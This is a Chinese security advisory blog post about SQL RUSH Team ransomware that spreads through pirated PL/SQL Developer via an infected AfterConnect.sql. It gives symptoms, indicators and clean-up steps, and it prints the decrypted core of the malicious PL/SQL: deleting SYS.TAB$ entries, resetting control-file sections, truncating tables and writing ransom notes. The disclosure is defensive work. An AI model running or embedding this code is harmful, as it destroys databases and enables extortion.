`

知己知彼-关于Oracle安全比特币勒索问题揭秘和防范

阅读更多
摘要: 风险从来都不是臆想和草木皆兵,就在你不经意的时刻,可能风险就突然降临到我们的身边。 近期,国内很多用户的 Oracle 数据库,突然遭遇到莫名其妙的攻击事件,大家种种猜测、揣摩、重试,引发了一次小小的数据恐慌。
风险从来都不是臆想和草木皆兵,就在你不经意的时刻,可能风险就突然降临到我们的身边。
近期,国内很多用户的 Oracle 数据库,突然遭遇到莫名其妙的攻击事件,大家种种猜测、揣摩、重试,引发了一次小小的数据恐慌。
在注意到这类安全事件之后,我们第一时间投入分析、采集,最后找出了问题的根源,昨天已经发出了全面的预警和警示,今天再次详述该类问题,与 Oracle 的用户们共为警醒。
最近问题的主要原因是某些用户下载了来源不明的数据库管理工具,导致数据库被感染。我们强烈推荐大家提高版权意识,购买正版软件,远离风险,从规范做起。
问题症状:
很多用户在录数据库时发现该问题,数据库应用弹出"锁死"提示,并且威胁说需要向黑客发送5个比特币方可获得解锁。
在客户端,你可能获得类似的提示信息:
在数据库受攻击之后,在数据库的告警日志中,可能充斥如下信息:
ORA-00604: error occurred at recursive SQL level 1
ORA-20315: 你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (大小写一致)  之后把你的Oracle SID邮寄地址 sqlrush@mail.com我们将让你知道如何解锁你的数据库 
Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.
ORA-06512: at “XXX.DBMS_CORE_INTERNAL         ", line 27
ORA-06512: at line 2
这里无非是一些警示和勒索,但是这儿 SQL RUSH Team,引发了大家的猜测,sqlrush @ mail.com ,这个地址 和 id 引发了对于始作俑者的猜测,当然事实不得而知。
问题原因:
我们通过有限的案例,详细分析了问题的原因和感染过程,在此披露出来,给 Oracle 的用户们作为参考。
注意:当一个问题研究清楚之后,就不再会产生恐惧,恐惧来自于未知,在没有遭到原因之前,大家的各种猜测导致问题扩大化,现在可以回到问题的本质上来了。
问题的根本原因是:如果用户从互联网上下载了盗版的 PL/SQL Developer 工具后(尤其是各种绿色版、破解版),就可能因为这个工具中招。所以这个问题和 Oracle 本身关系不大,也没有注入那么复杂。而是随着你使用这个工具,用户的权限就自然被附体的进行了入侵。
重要的问题要说三遍:盗版软件害人!
PL/SQL Developer  在中国的流行程度和盗版程度毋庸置疑。这个软件的安装目录存在一个脚本文件 AfterConnect.sql,这个脚本就是真正的问题所在。
正版软件安装,这个脚本文件是空文件,但是被注入的文件包含了一系列的JOB定义、存储过程和触发器定义,就是祸患的源头。
受感染文件 -  AfterConnect.sql 开头是这样的,伪装成一个 login.sql 的脚本内容,有清晰的注释代码:
640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=
实质内容,以加密方式展示,用户看不到内容,但是可以通过 unwrap 进行解密(但是注意那些解密程序不要存在恶意代码):
640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=
无疑,黑客是非常了解 Oracle 数据库的,其脚本代码的核心部分,解密后如下(做了删节,不要害人):
BEGIN
   SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;
   IF (DATE1>=1200) THEN
   EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system  as select * from sys.tab$';
   DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;
   COMMIT;
   EXECUTE IMMEDIATE 'alter system checkpoint';
   SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);
   FOR I IN 1..2046 LOOP
   DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
   DBMS_SYSTEM.KSDWRT(2, '你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (大小写一致)  之后把你的Oracle SID邮寄地址sqlrush@mail.com 我们将让你知道如何解锁你的数据库 ');
   END LOOP;
   END IF;
END; 
请注意黑客的专业性,在程序的开端有以下部分判断:
SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;
   IF (DATE1>=1200) THEN
也就是,判断数据库创建时间大于1200天,才开始动作(这个判断相当有见地,小库和新库,数据少不重要,先放长线钓大鱼),如果你的数据库还没有爆发,那可能是因为时间还没有到。
我们强烈建议用户检查数据库工具的使用情况,避免使用来历不明的工具产品。
我们强烈建议:采用正版软件,规避未知风险。
安全漏洞:
我们知道,几乎绝大多数数据库的客户端工具,在访问数据库时,都可以通过脚本进行一定的功能定义,而这些脚本往往就是安全问题的漏洞之一。本例的攻击手段非常初级,但是也非常巧妙。
下载来源不明、汉化来历不明、破解来历不明的工具是数据库管理大忌,以下列出了常见客户端工具的脚本位置,需要引起注意:
SQL*Plus: glogin.sql / login.sql
TOAD : toad.ini
PLSQLdeveloper: login.sql / afterconnect.sql
我们强烈建议用户加强数据库的权限管控、生产环境和测试环境隔离,严格管控开发和运维工具。
处置建议:
这个攻击是通过 JOB、触发器、存储过程 来协同工具的,所以如果数据库遭遇到这个问题,可以将 JOB 参数 job_queue_processes 设置为 0 ,屏蔽掉 JOB 的执行,然后重启数据库。可以清除注入对象,这些对象可能包括以下同名触发器和存储过程:
PROCEDURE "DBMS_CORE_INTERNAL         "
PROCEDURE "DBMS_SYSTEM_INTERNAL         "
PROCEDURE "DBMS_SUPPORT_INTERNAL         "
而攻击的核心代码还包括,这会 Truncate 数据表:
STAT:='truncate table '||USER||'.'||I.TABLE_NAME;
如果您的数据库已经遭受攻击和数据损失,可以紧急联系云和恩墨的服务团队,我们可以帮助您处理数据修复事宜。云和恩墨久经考验的ODU产品,可以在数据丢失后最大限度的恢复数据。云和恩墨的自动化巡检工具:Bethune(白求恩),内置一项检查,访问来源、访问工具分析,可以帮助用户梳理清楚你的数据库使用情况。别犹豫,去 https://bethune.enmotech.com 看看,不收钱。
事件回顾:
2015年9月,XcodeGhost入侵苹果iOS事件在业内引起不小震动。事件起因为不知名黑客向iOS应用开发工具Xcode植入恶意程序,通过网盘和论坛上传播,被感染的App并以此劫持苹果用户相关信息。来自多个安全团队数据显示,病毒感染波及AppStore下载量最高的5000个App其中的76个,保守估计受影响用户数超过一亿。
2012年2月,中文版putty等SSH远程管理工具被曝出存在后门,该后门会自动窃取管理员所输入的SSH用户名与口令,并将其发送至指定服务器上。
分享到:
评论

相关推荐

    安达信:知己知彼--提高“空降部队”存活率.pdf

    “空降部队”通常指的是企业引入的外部高级管理人员,他们往往具有丰富的经验和专业知识,但缺乏对新组织内部文化的了解。提高这类人员在新公司的存活率是企业管理中的一个重要议题。安达信公司的报告深入探讨了民营...

    威胁情报与主动防御-关于数字化安全呈现无边界趋势的思索.pdf

    当前,虚实边界被打破,网络防护的边界越发模糊,威胁情报的出现及拓展概,为防护者实现“知己知彼,百战不殆”提供了极大可能性,威胁情报通过向防护者提供外部威胁信息,形成了新的攻防平衡,同时,基于威胁情报的...

    青藤云勒索软件的认识与防御指南-36

    基于此,青藤云安全编写了《勒索软件的认识与防御指南》,从勒索软件的定义、来源、分类、攻击方式和典型家族等角度详细介绍了勒索软件的前世今生,并结合具体的安全产品和服务,给出了详细的解决方案,为企业组织...

    知己知彼百战不殆--公务员面试基础和技巧.docx

    1. 考官期望:考官希望看到的是一个稳重、自信、具备良好沟通能力和问题解决能力的考生。他们关注考生是否能够适应公务员岗位的要求,是否有责任心,以及能否在压力下保持冷静。 2. 考官反应:在面试过程中,考官...

    07 知己知彼:面试形式大揭秘.mp3

    07 知己知彼:面试形式大揭秘.mp3

    07 知己知彼:面试形式大揭秘.mp4

    07 知己知彼:面试形式大揭秘.mp4

    IT安全策略汇总-安全中国

    由此带来的基于网络连接的安全问题也日益突出,如何确保你的网络安全呢? 如何通过部署深度防御来规划安全的网络 通过WLAN测试验证网络的安全性与连接性 从路由器入手改善网络的安全性 Web安全策略:使用云安全服务...

    知己知彼 让无线路由器更安全.pdf

    知己知彼 让无线路由器更安全.pdf

    容灾白皮书-知己知彼百战不殆

    《容灾白皮书——知己知彼百战不殆》 在信息技术领域,容灾是一项至关重要的策略,它关乎到企业的生死存亡。本白皮书深入探讨了容灾的概念、重要性、技术和实践,旨在帮助企业更好地理解如何保护关键业务系统免受...

    2015届高考语文人生哲理篇写作素材知己知彼百战不殆

    在中国古代军事经典《孙子兵法》中有一句至理名言:“知己知彼,百战不殆”。这句话虽源自古代战场,但其背后所蕴含的深刻哲理,却早已跨越了时空的界限,成为我们处理各种事务,尤其是人际关系的黄金法则。2015届...

    计算机网络安全及防范技术

    现在网络病毒泛滥,防范首先就要知己知彼,本文就是来解决这问题的

    新形势下的业务安全和对策.pdf

    议题提到,目前黑产通过黑帽技术、木马病毒、漏洞利用工具、数据窃取整理等,利用工具网络入侵、钓鱼诈骗等。对此常用的防御方式有IP限制、...• 知己知彼- 深入了解黑产 • 联防联控 - 不正在共享数据的都是耍流氓

    信息安全知识与信息安全形势.ppt

    然而,技术的进步往往伴随着新的安全漏洞,如互联网连接的安全边界、身份验证机制、漏洞管理和安全监控等。 其次,信息安全问题与利益紧密相关。无论是国家之间的战略竞争,还是商业机密的争夺,信息都成为关键的...

    登山之路_——互联网公司安全建设心得.pdf

    安全不仅仅是技术问题,更是企业文化和战略层面的问题。安全建设需要与公司的整体发展相协调,而安全的最终目标是实现对内外威胁的全面防御。 综上所述,互联网公司的安全建设是一个系统工程,它包含了明确的安全...

    安全技术之电气安全培训讲义.pptx

    人们常言道,“知己知彼,百战不殆”,了解电气事故的成因和可能带来的后果,以及在紧急情况下应如何正确地进行急救,对于防范和减少电气事故至关重要。而在平时的作业中,要防止触及带电体和间接带电体,这就需要...

    计算机网络安全论文--大学论文.doc

    网络安全与黑客论文 摘要:随着网络在人们生活与工作的各方面使用的日益普遍,网络安全问题已经成 为一个被人们强烈关注的热点。而其中黑客攻击所造成的安全问题是很重要的一个方面 。本文将介绍有关黑客使用的手段...

    计算机网络安全论文--学位论文.doc

    网络安全与黑客论文 摘要:随着网络在人们生活与工作的各方面使用的日益普遍,网络安全问题已经成 为一个被人们强烈关注的热点。而其中黑客攻击所造成的安全问题是很重要的一个方面 。本文将介绍有关黑客使用的手段...

    云安全方面的参考文献,用于计算机专业毕业论文.pdf

    云安全是当前计算机行业中一个非常重要的话题,随着云计算的普及,云安全问题也日益严重。以下是关于云安全方面的参考文献概述: 云安全的定义和特点:云安全是指在云计算环境中保护云资源、云数据和云应用程序的...

    0 day安全:软件漏洞分析(光盘)

     微软安全机制揭秘:  深入挖掘GS安全编译选项、堆栈保护、Safe S.E.H等安全机制。知己知彼,知彼知己,在回顾安全技术对抗的过程中提高自己。  经典Oday案例分析:  精选历史上若干著名系统漏洞进行剖析。在...

    知己知彼做营销——了解客户性格-确定销售方略.ppt

    "知己知彼做营销——了解客户性格-确定销售方略"的主题强调了在与客户交往过程中,理解他们的性格特点对制定有效销售策略的重要性。王中营销培训课程系列针对小型饲料企业,通过深入解析客户性格,帮助销售人员更好...

Global site tag (gtag.js) - Google Analytics